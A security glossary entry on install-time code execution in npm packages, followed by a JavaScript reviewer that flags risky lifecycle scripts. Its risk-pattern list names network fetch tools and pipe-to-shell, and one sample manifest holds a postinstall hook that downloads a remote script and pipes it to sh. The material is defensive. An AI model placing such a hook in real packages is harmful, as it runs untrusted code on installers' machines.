Friday 26 June 2026 04:34:49 GMT+02:00

Netcrook


WIKICROOK

Install-time code execution

Code that runs while a package is being installed, which can widen the attack surface.

Install-time code execution means a package can run code while it is being installed, not just when the application later starts. In ecosystems like npm, this can happen through installer hooks, build steps, or scripts bundled with a dependency. Because the install process often has network access, file access, and sometimes access to developer credentials, it widens the attack surface for anyone who can control a package.

Attackers abuse this by hiding malicious logic in a package that looks legitimate, then stealing secrets, modifying build output, or downloading additional payloads during installation. Defenders treat it as a supply-chain risk: review packages and their scripts, pin dependencies, use scoped or short-lived credentials, and disable install scripts where practical. The goal is to limit what untrusted code can do at the moment a package is introduced into a system.
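The "review packages and their scripts" advice above is easier to follow with tooling. The following is an added example, not code from Netcrook or from npm: it reads a package's package.json, lists the npm lifecycle hooks that execute during installation (preinstall, install, postinstall, prepare and their pre/post variants), and flags commands that warrant a closer look, such as network fetches or piping into a shell. The sample manifests and the risk patterns are constructed for the example and are a starting heuristic, not a complete detector.

```javascript
// Added example (not Netcrook's or npm's code): list and flag install-time
// lifecycle scripts declared in package.json manifests before installing them.

// npm lifecycle hooks that run as part of `npm install` (real hook names).
const INSTALL_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preprepare', 'prepare', 'postprepare',
];

// Constructed heuristics: command fragments a reviewer would want to inspect.
const RISKY_PATTERNS = [
  { name: 'network fetch', re: /\b(curl|wget)\b/ },
  { name: 'pipe to shell', re: /\|\s*(sh|bash)\b/ },
  { name: 'inline node eval', re: /\bnode\s+-e\b/ },
  { name: 'base64 decode', re: /base64/i },
  { name: 'env read', re: /\bprintenv\b|process\.env/ },
];

// Return every install-time hook in a parsed manifest, with any flags that hit.
function findInstallHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map((hook) => {
      const command = String(scripts[hook]);
      const flags = RISKY_PATTERNS
        .filter((p) => p.re.test(command))
        .map((p) => p.name);
      return { hook, command, flags };
    });
}

// Review one manifest given as JSON text (as read from a tarball or node_modules).
function reviewManifest(name, manifestJson) {
  const hooks = findInstallHooks(JSON.parse(manifestJson));
  return {
    name,
    hooks,
    hasInstallHooks: hooks.length > 0,
    flaggedHooks: hooks.filter((h) => h.flags.length > 0).length,
  };
}

// Constructed sample manifests: no hooks, a legitimate native build, and a
// hook that downloads and executes remote content during install.
const SAMPLE_MANIFESTS = {
  'plain-lib': JSON.stringify({
    name: 'plain-lib', version: '1.0.0', scripts: { test: 'node test.js' },
  }),
  'native-addon': JSON.stringify({
    name: 'native-addon', version: '2.3.1', scripts: { install: 'node-gyp rebuild' },
  }),
  'suspicious': JSON.stringify({
    name: 'suspicious', version: '0.0.1',
    scripts: { postinstall: 'curl -s https://example.invalid/setup.sh | sh' },
  }),
};

// Review a map of name -> manifest JSON and return one result per package.
function reviewAll(manifests = SAMPLE_MANIFESTS) {
  return Object.entries(manifests).map(([name, json]) => reviewManifest(name, json));
}

// Stand-alone run: print a short report for the constructed samples.
if (typeof require !== 'undefined' && require.main === module) {
  for (const r of reviewAll()) {
    const status = r.flaggedHooks > 0 ? 'REVIEW' : r.hasInstallHooks ? 'hooks' : 'clean';
    console.log(`${status.padEnd(6)} ${r.name}`);
    for (const h of r.hooks) {
      console.log(`       ${h.hook}: ${h.command}${h.flags.length ? '  [' + h.flags.join(', ') + ']' : ''}`);
    }
  }
}

module.exports = { findInstallHooks, reviewManifest, reviewAll, INSTALL_HOOKS };
```

A hook such as `node-gyp rebuild` is a normal reason for install-time code, so the script reports it without flagging it; the point is to make every install-time command visible so a human can decide. To apply the page's last recommendation, npm itself can refuse to run these hooks: `npm install --ignore-scripts` for one run, or `ignore-scripts=true` in the project's `.npmrc` so that CI and developer machines both skip them unless a package is explicitly allowed.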
